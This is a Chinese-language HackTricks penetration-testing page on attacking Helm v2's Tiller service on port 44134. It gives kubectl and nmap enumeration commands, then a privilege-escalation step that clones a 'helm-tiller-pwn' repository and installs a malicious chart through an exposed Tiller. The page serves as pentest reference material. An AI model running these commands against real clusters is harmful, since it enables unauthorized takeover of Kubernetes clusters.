44134 - Pentesting Tiller (Helm)

上一页27017,27018 - Pentesting MongoDB 下一页44818/UDP/TCP - Pentesting EthernetIP

最后更新于1年前

44134 - Pentesting Tiller (Helm)

从零开始学习AWS黑客技术，成为专家 ！

其他支持HackTricks的方式：

如果您想看到您的公司在HackTricks中做广告或下载PDF格式的HackTricks，请查看!
获取
探索，我们的独家
加入 💬 或或关注我们的Twitter 🐦 。
通过向和 github仓库提交PR来分享您的黑客技巧。

基本信息

Helm是Kubernetes的包管理器。它允许打包YAML文件并在公共和私有存储库中分发它们。这些包被称为Helm Charts。Tiller是默认在端口44134上运行的服务。

默认端口: 44134

PORT      STATE SERVICE VERSION
44134/tcp open  unknown

枚举

如果你可以枚举不同命名空间的 pods 和/或 services，请枚举它们并搜索名称中带有**"tiller"**的实例：

kubectl get pods | grep -i "tiller"
kubectl get services | grep -i "tiller"
kubectl get pods -n kube-system | grep -i "tiller"
kubectl get services -n kube-system | grep -i "tiller"
kubectl get pods -n <namespace> | grep -i "tiller"
kubectl get services -n <namespace> | grep -i "tiller"

示例：

kubectl get pods -n kube-system
NAME                                       READY   STATUS             RESTARTS   AGE
kube-scheduler-controlplane                1/1     Running            0          35m
tiller-deploy-56b574c76d-l265z             1/1     Running            0          35m

kubectl get services -n kube-system
NAME            TYPE        CLUSTER-IP     EXTERNAL-IP   PORT(S)                  AGE
kube-dns        ClusterIP   10.96.0.10     <none>        53/UDP,53/TCP,9153/TCP   35m
tiller-deploy   ClusterIP   10.98.57.159   <none>        44134/TCP                35m

你也可以尝试查找运行在端口44134上的该服务：

sudo nmap -sS -p 44134 <IP>

然后，您可以枚举服务：

helm --host tiller-deploy.kube-system:44134 version

提权

默认情况下，Helm2 是以 高权限 安装在 命名空间 kube-system 中的，因此如果您找到该服务并具有访问权限，这可能允许您 提升权限。

git clone https://github.com/Ruil1n/helm-tiller-pwn
helm --host tiller-deploy.kube-system:44134 install --name pwnchart helm-tiller-pwn
/pwnchart